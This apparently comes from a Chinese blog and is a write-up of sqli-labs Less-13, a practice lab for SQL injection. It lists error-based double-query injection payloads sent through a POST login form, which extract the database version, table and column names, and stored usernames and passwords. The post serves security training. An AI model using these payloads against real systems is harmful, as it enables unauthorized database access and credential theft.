您的位置:首页 > 数据库

sqli-labs Less-13

2020-04-23 12:21 471 查看

Less-13 POST -Double Injection -Single quotes -String - with twist

0x01 

You
have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '1') LIMIT
0,1' at line 1

根据报错语句,可以用’) 闭合

uname=’) or 1=1#
0x02.获取数据库版本

uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


0x03.获取数据库名称

uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


0x04.获取表名

uname=’) union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=’security’ limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


可以通过改变limit的值来获取其他表名

uname=’) union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=’security’ limit 3,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

0x05.获取字段名

uname=') union select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema='security'and table_name='users'limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

uname=') union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


0x06.获取字段的个数

uname=') union select count(*),concat((select concat(count(*),0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


0x07.获取字段值

uname=') union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

查询语句具体的含义及理解 可以查看Less-5

  • 点赞
  • 收藏
  • 分享
  • 文章举报
SixTwelve 发布了18 篇原创文章 · 获赞 3 · 访问量 460 私信 关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航